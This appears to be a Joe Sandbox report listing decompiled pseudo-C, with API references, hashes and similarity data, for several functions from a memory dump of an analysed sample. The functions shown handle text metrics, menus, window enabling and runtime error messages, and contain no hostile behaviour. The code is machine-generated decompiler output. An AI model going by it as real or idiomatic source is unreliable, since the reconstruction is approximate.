Opcode ID: 8a9b55a29c4ff860124db4037a09d88fdcf40b724d14769906d711a8e0ebbbae
Instruction ID: c8df5cefcab56e12fb6afff3c38bb4f7a638dfcd913fb832871c6968f8fa9c0e
Opcode Fuzzy Hash: 8a9b55a29c4ff860124db4037a09d88fdcf40b724d14769906d711a8e0ebbbae
Instruction Fuzzy Hash: 4EF1E4B2A00108EBCB04CF99D995EEE77B9BF8C308F118259F919A7240D735EA15CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0042914E, Relevance: 15.2, APIs: 10, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0042914E(void* __ecx, long* _a4, int* _a8, int _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28, intOrPtr _a32, char* _a36, int* _a40, signed int* _a44) {
				intOrPtr _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v24;
				CHAR* _v28;
				int _v32;
				signed int _v36;
				signed int _v40;
				struct tagSIZE _v48;
				struct tagPOINT _v56;
				struct tagSIZE _v64;
				struct tagTEXTMETRICA _v120;
				struct tagTEXTMETRICA _v176;
				signed int _t119;
				signed int _t120;
				int _t121;
				signed int* _t125;
				long* _t127;
				signed int _t131;
				signed char _t132;
				int _t140;
				signed char* _t142;
				int _t144;
				int _t149;
				int _t153;
				signed int _t156;
				signed short _t159;
				signed char* _t167;
				int* _t170;
				signed int _t174;
				int _t175;
				int _t185;
				signed int _t187;
				int _t189;
				int _t190;
				void* _t191;
				int* _t193;

				_t191 = __ecx;
				GetTextMetricsA( *(__ecx + 8),  &_v120);
				GetTextMetricsA( *(__ecx + 4),  &_v176);
				GetTextExtentPoint32A( *(__ecx + 8), 0x42e890, 1,  &_v48);
				_t119 = GetTextAlign( *(__ecx + 8));
				_v40 = _t119;
				_t120 = _t119 & 0x00000001;
				_v36 = _t120;
				if(_t120 == 0) {
					_t170 = _a8;
				} else {
					GetCurrentPositionEx( *(__ecx + 4),  &_v56);
					_t170 = _a8;
					 *_t170 = _v56.x;
				}
				_t121 =  *_t170;
				_t193 = _a40;
				_t167 = _a12;
				_t185 = 0;
				_v28 = _t167;
				_v32 = _t121;
				_a12 = _t121;
				_v12 = 0;
				_v20 = 0;
				if(_a20 != 0) {
					if(_a24 != 1) {
						_t159 = GetTabbedTextExtentA( *(_t191 + 8), 0x42e88c, 1, 0, 0);
						_t170 = _a8;
						_t185 = 0;
						_v20 = _t159 & 0x0000ffff;
					} else {
						_v20 =  *_a28;
					}
				}
				_v8 = _t185;
				if( *_a16 <= _t185) {
					L31:
					_t187 = _v40 & 0x00000006;
					_v48.cx = _a12 -  *_t170;
					_t125 = _a44;
					 *_t125 =  *_t125 & 0x00000000;
					if(_t187 != 0) {
						if(_t187 != 6) {
							if(_t187 == 2) {
								 *_t125 = _v12;
							}
							L38:
							if(_v36 != 0) {
								MoveToEx( *(_t191 + 4),  *_t170, _v56.y, 0);
							}
							 *_a16 = _t193 - _a40 >> 2;
							_t127 = _a4;
							 *_t127 = _v48.cx;
							_t127[1] = _v48.cy;
							return _t127;
						}
						asm("cdq");
						_t131 = _v12 - _t187 >> 1;
						L33:
						 *_t170 =  *_t170 + _t131;
						goto L38;
					}
					_t131 = _v12;
					goto L33;
				} else {
					while(1) {
						_t132 =  *_t167;
						_t174 = 0 | _t132 == _v120.tmBreakChar;
						_v24 = _t174;
						if(_t174 != _t185 || _a20 != _t185 && _t132 == 9) {
							GetTextExtentPoint32A( *(_t191 + 8), _v28, _v24 - _v28 + _t167,  &_v64);
							_t140 = _v64.cx - _v120.tmOverhang + _v32;
							if(_v24 == 0) {
								_t140 = E0042911A(_t140, _a24, _a28, _a32, _v20);
							}
							_t175 = _t140;
							if(_t193 != _a40) {
								 *((intOrPtr*)(_t193 - 4)) =  *((intOrPtr*)(_t193 - 4)) + _t175 - _a12;
							} else {
								_v12 = _v12 + _t175 - _a12;
							}
							_a12 = _t140;
							_v32 = _t140;
							_v28 =  &(_t167[1]);
						} else {
							_t144 = _t132 & 0x000000ff;
							if(( *(_t144 + 0x43b761) & 0x00000004) == 0) {
								GetCharWidthA( *(_t191 + 4), _t144, _t144,  &_v16);
								if(GetCharWidthA( *(_t191 + 8),  *_t167 & 0x000000ff,  *_t167 & 0x000000ff, _t193) == 0) {
									 *_t193 = _v120.tmAveCharWidth;
								}
								_t189 = _v16;
							} else {
								_t189 = _v176.tmAveCharWidth;
								 *_t193 = _v120.tmAveCharWidth;
							}
							_t190 = _t189 - _v176.tmOverhang;
							 *_t193 =  *_t193 - _v120.tmOverhang;
							_t149 =  *_t193;
							_a12 = _a12 + _t149;
							_v16 = _t190;
							if(_t193 != _a40) {
								asm("cdq");
								_t156 = _t149 - _t190 - _t190 >> 1;
								 *((intOrPtr*)(_t193 - 4)) =  *((intOrPtr*)(_t193 - 4)) + _t156;
								 *_t193 = _t149 - _t156;
							}
							_a36 = _a36 + 1;
							 *_a36 =  *_t167;
							if(( *(( *_t167 & 0x000000ff) + 0x43b761) & 0x00000004) != 0) {
								_a36 = _a36 + 1;
								 *_a36 = _t167[1];
								_t153 =  *_t193;
								_a12 = _a12 + _t153;
								_t193 =  &(_t193[1]);
								_v8 = _v8 + 1;
								 *_t193 = _t153;
							}
							_t193 =  &(_t193[1]);
						}
						_t142 = E00406AFA(_t167);
						_v8 = _v8 + 1;
						_t167 = _t142;
						if(_v8 >=  *_a16) {
							break;
						}
						_t185 = 0;
					}
					_t170 = _a8;
					goto L31;
				}
			}

0x00429162
0x00429168
0x00429174
0x00429184
0x0042918d
0x00429193
0x00429196
0x00429199
0x0042919c
0x004291b5
0x0042919e
0x004291a5
0x004291ab
0x004291b1
0x004291b1
0x004291b8
0x004291ba
0x004291be
0x004291c1
0x004291c3
0x004291c9
0x004291cc
0x004291cf
0x004291d2
0x004291d5
0x004291db
0x004291f3
0x004291f9
0x004291fc
0x00429201
0x004291dd
0x004291e2
0x004291e2
0x004291db
0x00429207
0x0042920c
0x0042934e
0x00429356
0x0042935a
0x0042935d
0x00429360
0x00429365
0x00429371
0x00429380
0x00429385
0x00429385
0x00429387
0x0042938b
0x00429397
0x00429397
0x004293aa
0x004293ac
0x004293b0
0x004293b5
0x004293b9
0x004293b9
0x00429376
0x00429379
0x0042936a
0x0042936a
0x00000000
0x0042936a
0x00429367
0x00000000
0x00429212
0x00429216
0x00429216
0x0042921d
0x00429222
0x00429225
0x004292e9
0x004292f5
0x004292fc
0x0042930b
0x0042930b
0x00429313
0x00429315
0x00429322
0x00429317
0x0042931a
0x0042931a
0x00429325
0x00429328
0x0042932e
0x00429238
0x00429238
0x00429242
0x0042925a
0x00429271
0x00429276
0x00429276
0x00429278
0x00429244
0x00429247
0x0042924d
0x0042924d
0x0042927e
0x00429284
0x00429286
0x00429288
0x0042928e
0x00429291
0x00429297
0x0042929a
0x0042929e
0x004292a1
0x004292a1
0x004292a8
0x004292ab
0x004292b7
0x004292bf
0x004292c2
0x004292c4
0x004292c6
0x004292c9
0x004292cc
0x004292cf
0x004292cf
0x004292d1
0x004292d1
0x00429332
0x00429337
0x0042933e
0x00429345
0x00000000
0x00000000
0x00429214
0x00429214
0x0042934b
0x00000000
0x0042934b

APIs

GetTextMetricsA.GDI32(?,?), ref: 00429168
GetTextMetricsA.GDI32(?,?), ref: 00429174
GetTextExtentPoint32A.GDI32(?,0042E890,00000001,?), ref: 00429184
GetTextAlign.GDI32(?), ref: 0042918D
GetCurrentPositionEx.GDI32(?,?), ref: 004291A5
GetTabbedTextExtentA.USER32(?,0042E88C,00000001,00000000,00000000), ref: 004291F3
GetCharWidthA.GDI32(?,?,?,?), ref: 0042925A
GetCharWidthA.GDI32(?,00000000,00000000,?), ref: 00429269
GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 004292E9
MoveToEx.GDI32(?,?,?,00000000), ref: 00429397

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Text$Extent$CharMetricsPoint32Width$AlignCurrentMovePositionTabbed
String ID:
API String ID: 2070200100-0
Opcode ID: dbc0e650c6b3921614c61be6481f5bcec17f5e74d2995e425cda8442065db2ea
Instruction ID: 5ee3fa6e800e5c42c7f25724716c3f9a342090dd9abbfd9a25ef7c0a74f7065c
Opcode Fuzzy Hash: dbc0e650c6b3921614c61be6481f5bcec17f5e74d2995e425cda8442065db2ea
Instruction Fuzzy Hash: EE914670A0021AEFCF15CFA8D884AEEBBB5FF48304F54856AE859A7250D334AD51CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0042185A, Relevance: 15.1, APIs: 10, Instructions: 138
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0042185A(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				int _v16;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				int _v44;
				char _v48;
				void* __ebp;
				int _t53;
				int _t58;
				int _t61;
				signed int _t65;
				int _t66;
				void* _t67;
				int _t69;
				intOrPtr _t73;
				int _t74;
				int _t75;
				intOrPtr* _t77;
				struct HMENU__* _t83;
				intOrPtr _t84;

				_t73 = __ecx;
				_v8 = __ecx;
				_t53 = E0041A8B4( *((intOrPtr*)(__ecx + 0x1c)));
				if(_a12 == 0) {
					_t77 =  *((intOrPtr*)(__ecx + 0x68));
					_t84 = _a4;
					if(_t77 == 0) {
						L3:
						E00412F9D( &_v48);
						_v36 = _t84;
						if( *((intOrPtr*)(E004249C4() + 0x54)) !=  *(_t84 + 4)) {
							if(GetMenu( *(_t73 + 0x1c)) != 0) {
								_t67 = E00414CEF(_t73);
								if(_t67 != 0) {
									_t83 = GetMenu( *(_t67 + 0x1c));
									if(_t83 != 0) {
										_t69 = GetMenuItemCount(_t83);
										_t75 = 0;
										_a12 = _t69;
										if(_t69 > 0) {
											while(GetSubMenu(_t83, _t75) !=  *(_t84 + 4)) {
												_t75 = _t75 + 1;
												if(_t75 < _a12) {
													continue;
												} else {
												}
												goto L13;
											}
											_push(_t83);
											_v12 = E00417635();
										}
										L13:
										_t73 = _v8;
									}
								}
							}
						} else {
							_v12 = _t84;
						}
						_t53 = GetMenuItemCount( *(_t84 + 4));
						_v40 = _v40 & 0x00000000;
						_v16 = _t53;
						if(_t53 > 0) {
							do {
								_t58 = GetMenuItemID( *(_t84 + 4), _v40);
								_v44 = _t58;
								if(_t58 != 0) {
									if(_t58 != 0xffffffff) {
										_v32 = _v32 & 0x00000000;
										if( *((intOrPtr*)(_t73 + 0x3c)) != 0 && _t58 < 0xf000) {
											_push(1);
											_pop(0);
										}
										_push(0);
										goto L27;
									} else {
										_push(GetSubMenu( *(_t84 + 4), _v40));
										_t65 = E00417635();
										_v32 = _t65;
										if(_t65 != 0) {
											_t66 = GetMenuItemID( *(_t65 + 4), 0);
											_v44 = _t66;
											if(_t66 != 0 && _t66 != 0xffffffff) {
												_push(0);
												L27:
												_push(_t73);
												E00413162( &_v48);
												_t61 = GetMenuItemCount( *(_t84 + 4));
												_t74 = _t61;
												if(_t74 < _v16) {
													_v40 = _v40 + _t61 - _v16;
													while(_v40 < _t74 && GetMenuItemID( *(_t84 + 4), _v40) == _v44) {
														_v40 = _v40 + 1;
													}
												}
												_v16 = _t74;
												_t73 = _v8;
											}
										}
									}
								}
								_v40 = _v40 + 1;
								_t53 = _v40;
							} while (_t53 < _v16);
						}
					} else {
						_t53 =  *((intOrPtr*)( *_t77 + 0x74))(_t84, _a8, 0);
						if(_t53 == 0) {
							goto L3;
						}
					}
				}
				return _t53;
			}

0x00421862
0x00421865
0x0042186b
0x00421874
0x0042187a
0x0042187d
0x00421882
0x00421897
0x0042189a
0x0042189f
0x004218ad
0x004218c1
0x004218c5
0x004218cc
0x004218d3
0x004218d7
0x004218da
0x004218e0
0x004218e2
0x004218e7
0x004218e9
0x004218f6
0x004218fa
0x00000000
0x00000000
0x004218fc
0x00000000
0x004218fa
0x004218fe
0x00421904
0x00421904
0x00421907
0x00421907
0x00421907
0x004218d7
0x004218cc
0x004218af
0x004218af
0x004218af
0x0042190d
0x00421913
0x00421917
0x0042191c
0x00421928
0x0042192e
0x00421932
0x00421935
0x0042193e
0x00421970
0x00421978
0x00421981
0x00421983
0x00421983
0x00421988
0x00000000
0x00421940
0x0042194c
0x0042194d
0x00421954
0x00421957
0x0042195e
0x00421962
0x00421965
0x0042196c
0x00421989
0x00421989
0x0042198d
0x00421995
0x0042199b
0x004219a0
0x004219a5
0x004219a8
0x004219ba
0x004219ba
0x004219a8
0x004219bf
0x004219c2
0x004219c2
0x00421965
0x00421957
0x0042193e
0x004219c5
0x004219c8
0x004219cb
0x00421928
0x00421884
0x0042188c
0x00421891
0x00000000
0x00000000
0x00421891
0x00421882
0x004219d8

APIs

Part of subcall function 0041A8B4: GetFocus.USER32(?,?,?,00421870,?), ref: 0041A8B7
Part of subcall function 0041A8B4: GetParent.USER32(00000000), ref: 0041A8DE
Part of subcall function 0041A8B4: GetWindowLongA.USER32 ref: 0041A8F9
Part of subcall function 0041A8B4: GetParent.USER32(?), ref: 0041A907
Part of subcall function 0041A8B4: GetDesktopWindow.USER32 ref: 0041A90B
Part of subcall function 0041A8B4: SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 0041A91F

GetMenu.USER32(?), ref: 004218BD
GetMenu.USER32(?), ref: 004218D1
GetMenuItemCount.USER32 ref: 004218DA
GetSubMenu.USER32 ref: 004218EB
GetMenuItemCount.USER32 ref: 0042190D
GetMenuItemID.USER32(?,00000000), ref: 0042192E
GetSubMenu.USER32 ref: 00421946
GetMenuItemID.USER32(?,00000000), ref: 0042195E
GetMenuItemCount.USER32 ref: 00421995
GetMenuItemID.USER32(?,00000000), ref: 004219B3

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
String ID:
API String ID: 4186786570-0
Opcode ID: 6dca45552e476573e8ddd484fced48f908dc2b4a0e5e43a68bf7886d0696cfe4
Instruction ID: c2df077858419d5e37a5876f97d7879e649ce0b97625e1102e6641939069eb9a
Opcode Fuzzy Hash: 6dca45552e476573e8ddd484fced48f908dc2b4a0e5e43a68bf7886d0696cfe4
Instruction Fuzzy Hash: C35190B0B002189FCF11EF65D990BAEB7B5EF18314FA0446AE411E6261D739DD82DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00420900, Relevance: 15.1, APIs: 10, Instructions: 102
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00420900() {
				void* __ecx;
				void* __ebp;
				struct HWND__* _t21;
				int _t33;
				void* _t40;
				void* _t41;
				struct HWND__* _t46;
				struct HWND__* _t47;
				signed int _t48;
				signed int _t49;
				void* _t50;

				_t40 = _t41;
				 *(_t40 + 0xa0) =  *(_t40 + 0xa0) + 1;
				_t21 = _t40 + 0xa0;
				if( *(_t40 + 0xa0) > 1) {
					L18:
					return _t21;
				}
				 *((intOrPtr*)(_t50 + 0x14)) = E00414CEF(_t41);
				_t48 = 0;
				_t21 = GetWindow(GetDesktopWindow(), 5);
				_t46 = _t21;
				if(_t46 == 0) {
					goto L18;
				} else {
					goto L2;
				}
				do {
					L2:
					if(IsWindowEnabled(_t46) != 0) {
						_push(_t46);
						if(E00413767() != 0 && E004208E0( *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x10)) + 0x1c)), _t46) != 0 && SendMessageA(_t46, 0x36c, 0, 0) == 0) {
							_t48 = _t48 + 1;
						}
					}
					_t21 = GetWindow(_t46, 2);
					_t46 = _t21;
				} while (_t46 != 0);
				if(_t48 != 0) {
					 *(_t40 + 0xa4) = E004131DD(4 + _t48 * 4);
					_push(5);
					_t49 = 0;
					_push(GetDesktopWindow());
					while(1) {
						_t47 = GetWindow();
						if(_t47 == 0) {
							break;
						}
						if(IsWindowEnabled(_t47) != 0) {
							_push(_t47);
							if(E00413767() != 0 && E004208E0( *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x10)) + 0x1c)), _t47) != 0) {
								_t33 = SendMessageA(_t47, 0x36c, 0, 0);
								if(_t33 == 0) {
									EnableWindow(_t47, _t33);
									( *(_t40 + 0xa4))[_t49] = _t47;
									_t49 = _t49 + 1;
								}
							}
						}
						_push(2);
						_push(_t47);
					}
					_t21 =  *(_t40 + 0xa4);
					_t21[_t49] = _t21[_t49] & 0x00000000;
				}
			}

0x00420902
0x00420906
0x00420913
0x0042091a
0x00420a16
0x00420a1b
0x00420a1b
0x00420927
0x0042092b
0x0042093a
0x0042093c
0x00420940
0x00000000
0x00000000
0x00000000
0x00000000
0x00420946
0x00420946
0x0042094f
0x00420951
0x00420959
0x00420980
0x00420980
0x00420959
0x00420984
0x00420986
0x00420988
0x0042098e
0x004209a2
0x004209a8
0x004209aa
0x004209b2
0x004209b3
0x004209b5
0x004209b9
0x00000000
0x00000000
0x004209c4
0x004209c6
0x004209ce
0x004209eb
0x004209f3
0x004209f7
0x00420a03
0x00420a06
0x00420a06
0x004209f3
0x004209ce
0x00420a07
0x00420a09
0x00420a09
0x00420a0c
0x00420a12
0x00420a12

APIs

GetDesktopWindow.USER32 ref: 0042092D
GetWindow.USER32(00000000), ref: 0042093A
IsWindowEnabled.USER32(00000000), ref: 00420947
SendMessageA.USER32(00000000,0000036C,00000000,00000000), ref: 00420976
GetWindow.USER32(00000000,00000002), ref: 00420984
GetDesktopWindow.USER32 ref: 004209AC
GetWindow.USER32(00000000), ref: 004209B3
IsWindowEnabled.USER32(00000000), ref: 004209BC
SendMessageA.USER32(00000000,0000036C,00000000,00000000), ref: 004209EB
EnableWindow.USER32(00000000,00000000), ref: 004209F7

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$DesktopEnabledMessageSend$Enable
String ID:
API String ID: 2339141687-0
Opcode ID: b425f5d9508085c9cae4404486b252f16e1b35d7c8077e0574aa4d7a51abd98b
Instruction ID: 9d4a9da4e21fb217c8a7ce5c71c2f292f8e7f618580f1a2ae5b0fad087dd6ca4
Opcode Fuzzy Hash: b425f5d9508085c9cae4404486b252f16e1b35d7c8077e0574aa4d7a51abd98b
Instruction Fuzzy Hash: 6B31B1717013286FE731AF25AC05B6B779CEF01795F850026FE41DA293DB68C8418AED

Uniqueness

Uniqueness Score: -1.00%

Function 0041EC61, Relevance: 15.1, APIs: 10, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041EC61(void* __ecx, int _a4) {
				int _v8;
				struct tagRECT _v24;
				int _t39;
				int _t42;
				int _t61;
				int _t64;
				void* _t66;
				long _t67;
				int _t69;

				_t67 = _a4;
				_t66 = __ecx;
				_t39 = DefWindowProcA( *(__ecx + 0x1c), 0x46, 0, _t67);
				if(( *(_t67 + 0x18) & 0x00000001) == 0) {
					GetWindowRect( *(_t66 + 0x1c),  &_v24);
					_t42 = _a4;
					_t69 = _v24.right - _v24.left;
					_t64 =  *(_t42 + 0x10);
					_t61 = _v24.bottom - _v24.top;
					_t39 =  *(_t42 + 0x14);
					_v8 = _t64;
					_a4 = _t39;
					if(_t64 != _t69 && ( *(_t66 + 0x65) & 0x00000004) != 0) {
						SetRect( &_v24, _t64 -  *0x439bf0, 0, _t64, _t39);
						InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
						SetRect( &_v24, _t69 -  *0x439bf0, 0, _t69, _a4);
						InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
						_t64 = _v8;
						_t39 = _a4;
					}
					if(_t39 != _t61 && ( *(_t66 + 0x65) & 0x00000008) != 0) {
						SetRect( &_v24, 0, _t39 -  *0x439bf4, _t64, _t39);
						InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
						SetRect( &_v24, 0, _t61 -  *0x439bf4, _v8, _t61);
						return InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
					}
				}
				return _t39;
			}

0x0041ec69
0x0041ec6e
0x0041ec77
0x0041ec81
0x0041ec8e
0x0041ec97
0x0041ec9a
0x0041eca0
0x0041eca3
0x0041eca6
0x0041ecab
0x0041ecae
0x0041ecb1
0x0041ecc8
0x0041ecd7
0x0041ecee
0x0041ecfd
0x0041ed03
0x0041ed06
0x0041ed06
0x0041ed0b
0x0041ed28
0x0041ed33
0x0041ed4a
0x00000000
0x0041ed55
0x0041ed0b
0x0041ed5f

APIs

DefWindowProcA.USER32(?,00000046,00000000,?), ref: 0041EC77
GetWindowRect.USER32 ref: 0041EC8E
SetRect.USER32 ref: 0041ECC8
InvalidateRect.USER32(?,?,00000001), ref: 0041ECD7
SetRect.USER32 ref: 0041ECEE
InvalidateRect.USER32(?,?,00000001), ref: 0041ECFD
SetRect.USER32 ref: 0041ED28
InvalidateRect.USER32(?,?,00000001), ref: 0041ED33
SetRect.USER32 ref: 0041ED4A
InvalidateRect.USER32(?,?,00000001), ref: 0041ED55

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Rect$Invalidate$Window$Proc
String ID:
API String ID: 570070710-0
Opcode ID: 8724871abec8598df3563b0eda9aa5d8796d70e5df21c29b53d9ac8203d78ebf
Instruction ID: 516b3e1e2029e257780fbb0876dd7829c2ddb4b881f79dfa1f5106cbf91c212e
Opcode Fuzzy Hash: 8724871abec8598df3563b0eda9aa5d8796d70e5df21c29b53d9ac8203d78ebf
Instruction Fuzzy Hash: EC31CB7590020ABFDB10DF94ED88FAA7B7DFB04344F544125FA01A61A0D774AE95CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409911, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E00409911(void* __edi, long _a4) {
				char _v164;
				char _v424;
				int _t17;
				long _t19;
				signed int _t42;
				long _t47;
				void* _t48;
				signed int _t54;
				void** _t56;
				void* _t57;

				_t48 = __edi;
				_t47 = _a4;
				_t42 = 0;
				_t17 = 0x437068;
				while(_t47 !=  *_t17) {
					_t17 = _t17 + 8;
					_t42 = _t42 + 1;
					if(_t17 < 0x4370f8) {
						continue;
					}
					break;
				}
				_t54 = _t42 << 3;
				_t2 = _t54 + 0x437068; // 0x3c000000
				if(_t47 ==  *_t2) {
					_t17 =  *0x439cf0; // 0x0
					if(_t17 == 1 || _t17 == 0 &&  *0x436ba4 == 1) {
						_t16 = _t54 + 0x43706c; // 0x42f53c
						_t56 = _t16;
						_t19 = E00405A40( *_t56);
						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
					} else {
						if(_t47 != 0xfc) {
							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
								E00409B00( &_v424, "<program name unknown>");
							}
							_push(_t48);
							_t49 =  &_v424;
							if(E00405A40( &_v424) + 1 > 0x3c) {
								_t49 = E00405A40( &_v424) +  &_v424 - 0x3b;
								E0040AD30(E00405A40( &_v424) +  &_v424 - 0x3b, "...", 3);
								_t57 = _t57 + 0x10;
							}
							E00409B00( &_v164, "Runtime Error!\n\nProgram: ");
							E00409B10( &_v164, _t49);
							E00409B10( &_v164, "\n\n");
							_t12 = _t54 + 0x43706c; // 0x42f53c
							E00409B10( &_v164,  *_t12);
							_t17 = E0040AC99( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return _t17;
			}

0x00409911
0x0040991a
0x0040991d
0x0040991f
0x00409924
0x00409928
0x0040992b
0x00409931
0x00000000
0x00000000
0x00000000
0x00409931
0x00409936
0x00409939
0x0040993f
0x00409945
0x0040994d
0x00409a3e
0x00409a3e
0x00409a49
0x00409a5b
0x00409964
0x0040996a
0x00409986
0x00409994
0x0040999a
0x004099a1
0x004099a3
0x004099b3
0x004099ce
0x004099d6
0x004099db
0x004099db
0x004099ea
0x004099f7
0x00409a08
0x00409a0d
0x00409a1a
0x00409a30
0x00409a38
0x0040996a
0x0040994d
0x00409a63

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 0040997E
GetStdHandle.KERNEL32(000000F4,0042F53C,00000000,?,00000000,?), ref: 00409A54
WriteFile.KERNEL32(00000000), ref: 00409A5B

Strings

Microsoft Visual C++ Runtime Library, xrefs: 00409A2A
hpC, xrefs: 0040991F
Runtime Error!Program: , xrefs: 004099E4
..., xrefs: 004099D0
<program name unknown>, xrefs: 0040998E

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $hpC
API String ID: 3784150691-1464146632
Opcode ID: 33035c65495730e30a5fb77a12ee862b660262d042e41123e8c96b74bcb04291
Instruction ID: b539e999a38423ee123e62db49a79e9b5e142f56b6bf41d1579e584f354440c8
Opcode Fuzzy Hash: 33035c65495730e30a5fb77a12ee862b660262d042e41123e8c96b74bcb04291
Instruction Fuzzy Hash: AF31C372700218AEDF20EA61DC86FAA377CEB45304F90047BF545F61C2E678AE84CE59

Uniqueness

Uniqueness Score: -1.00%

Function 0041538C, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0041538C(void* __ebx, void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				void* __ebp;
				void* _t14;
				void* _t17;
				void* _t18;
				void* _t28;
				struct HWND__* _t29;
				signed int _t33;
				void* _t36;
				void* _t40;
				void* _t43;

				_t28 = __ebx;
				_push(__ecx);
				_t36 = __ecx;
				_t40 = E00414CEF(__ecx);
				_t33 = _a4 & 0x0000fff0;
				_t14 = _t33 - 0xf040;
				if(_t14 == 0) {
					L12:
					if(_a8 != 0x75 || _t40 == 0) {
						L15:
						goto L16;
					} else {
						E004166F5(_t40);
						L11:
						_push(1);
						_pop(0);
						L16:
						return 0;
					}
				}
				_t17 = _t14 - 0x10;
				if(_t17 == 0) {
					goto L12;
				}
				_t18 = _t17 - 0x10;
				if(_t18 == 0 || _t18 == 0xa0) {
					if(_t33 == 0xf060 || _a8 != 0) {
						if(_t40 != 0) {
							_push(_t28);
							_t29 =  *(_t36 + 0x1c);
							_v8 = GetFocus();
							E00413740(_t43, SetActiveWindow( *(_t40 + 0x1c)));
							SendMessageA( *(_t40 + 0x1c), 0x112, _a4, _a8);
							if(IsWindow(_t29) != 0) {
								SetActiveWindow(_t29);
							}
							if(IsWindow(_v8) != 0) {
								SetFocus(_v8);
							}
						}
					}
					goto L11;
				} else {
					goto L15;
				}
			}

0x0041538c
0x0041538f
0x00415392
0x0041539c
0x0041539e
0x004153a6
0x004153ab
0x00415432
0x00415437
0x00415446
0x00000000
0x0041543d
0x0041543f
0x0041542d
0x0041542d
0x0041542f
0x00415448
0x0041544b
0x0041544b
0x00415437
0x004153b1
0x004153b4
0x00000000
0x00000000
0x004153b6
0x004153b9
0x004153cc
0x004153d6
0x004153d8
0x004153d9
0x004153eb
0x004153f1
0x00415404
0x00415415
0x00415418
0x00415418
0x00415422
0x00415427
0x00415427
